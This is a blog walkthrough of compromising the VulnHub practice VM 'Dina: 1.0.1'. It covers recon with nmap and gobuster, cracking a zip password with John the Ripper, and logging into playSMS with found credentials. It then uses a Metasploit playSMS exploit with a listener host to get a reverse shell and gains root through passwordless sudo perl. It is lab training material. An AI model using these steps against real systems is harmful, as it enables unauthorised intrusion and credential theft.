Dina: 1.0.1 [VulnHub] — Walkthrough

Anu Shibin Joseph Raj
Nov 2 · 4 min read

Hi! 👋 Today we’ll be looking at how I pwned another beginner level VM called Dina: 1.0.1 created by Touhid Shaikh on Vulnhub.

Let’s go 🏃


As always, I’m starting with the netdiscover tool to find the IP of the remote machine:

root@kali:~# netdiscover
Finding the IP of the remote machine using the netdiscover tool
Finding the IP of the remote machine using the netdiscover tool
Finding the IP of the remote machine using the netdiscover tool

Now let’s see the services running on the box with the help of the nmap tool by performing an aggressive scan on all the ports of the remote machine:

root@kali:~# nmap -p- -A 192.168.0.15
Finding exposed services on the remote machine using the nmap tool
Finding exposed services on the remote machine using the nmap tool
Finding exposed services on the remote machine using the nmap tool

There is only an HTTP service running at port 80. Let’s check what inside it.

HTTP (80):

The HTML landing page didn’t give much information other than what Dina meant.

http://192.168.0.15/
Landing HTML page
Landing HTML page
Landing HTML page

Next thing I looked into was the robots.txt file:

http://192.168.0.15/robots.txt
Content of the robots.txt file
Content of the robots.txt file
Content of the robots.txt file

That’s a lot of directories! I checked each of them one by one and found some passwords in the page source of one of them!

http://192.168.0.15/nothing/
Passwords found in one of the files mentioned in the robots.txt file
Passwords found in one of the files mentioned in the robots.txt file
Passwords found in one of the files mentioned in the robots.txt file

Then I checked elsewhere inside the webpage but couldn’t find anything else. So I moved on to run a gobuster directory scan.

root@kali:~# gobuster dir -u http://192.168.0.15/ -w /usr/share/wordlists/dirb/big.txt
gobuster directory scan results
gobuster directory scan results
gobuster directory scan results

The gobuster scan result had one extra folder, called “secure”, which was not present in the robots.txt file.

There was a zip archive inside this folder. But it was password protected. So I used the zip2john tool to extract the password hash first. Then I used the john tool along with the passwords that we gathered from the webpage to crack the hash. This is how I did it:

root@kali:~# zip2john backup.zip > ziphash.txt
root@kali:~# cat ziphash.txt
root@kali:~# cat pass.txt
root@kali:~# john --wordlist=pass.txt ziphash.txt
Cracking the zip file’s password using John the Ripper
Cracking the zip file’s password using John the Ripper
Cracking the ZIP archive’s password using John the Ripper

Yay! We got the password! On extracting the ZIP and reading the content of the file inside, we get another directory name which is present on the HTTP server.

Content of the ZIP archive
Content of the ZIP archive
Content of the ZIP archive

I headed to that webpage and got a login page. After brute-forcing all the passwords that we have, I got the correct one:

Username: touhid

Password: diana

Logged into the playSMS application deployed on the HTTP Server

There was a playSMS application deployed in it. So I checked in Metasploit if there were any exploits available for it. And there was one! So I used it to get a reverse shell.

root@kali:~# msfdb start
root@kali:~# msfconsole -q
msf5 > search playsms
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 > set RHOSTS 192.168.0.15
msf5 > set RPORT 80
msf5 > set TARGETURI /SecreTSMSgatwayLogin
msf5 > set USERNAME touhid
msf5 > set PASSWORD diana
msf5 > set LHOST 192.168.0.14
msf5 > exploit
Exploiting the vulnerability in the PlaySMS application using Metasploit to get a reverse shell
Exploiting the vulnerability in the PlaySMS application using Metasploit to get a reverse shell
Exploiting the vulnerability in the PlaySMS application using Metasploit to get a reverse shell

Yay! We’re in 😃

Privilege escalation was even easier since perl had sudo execution rights with no password 😁

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
root@Dina:~# cat flag.txt

Hooray! 💃

The End 😄


Thanks for staying so far 😃

A clap 👏 would encourage me to write more like this 🤗. You may check my profile for my other walkthroughs. I write one every week.

You can follow me on Twitter 🐦 to get updates on all the machines that I pwn 😄.

Please mention your doubts, comments, and suggestions below.

See you in the next write-up 😄

Vale! 😃👋

Anu Shibin Joseph Raj

Written by

Script Kiddie | Java Developer

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade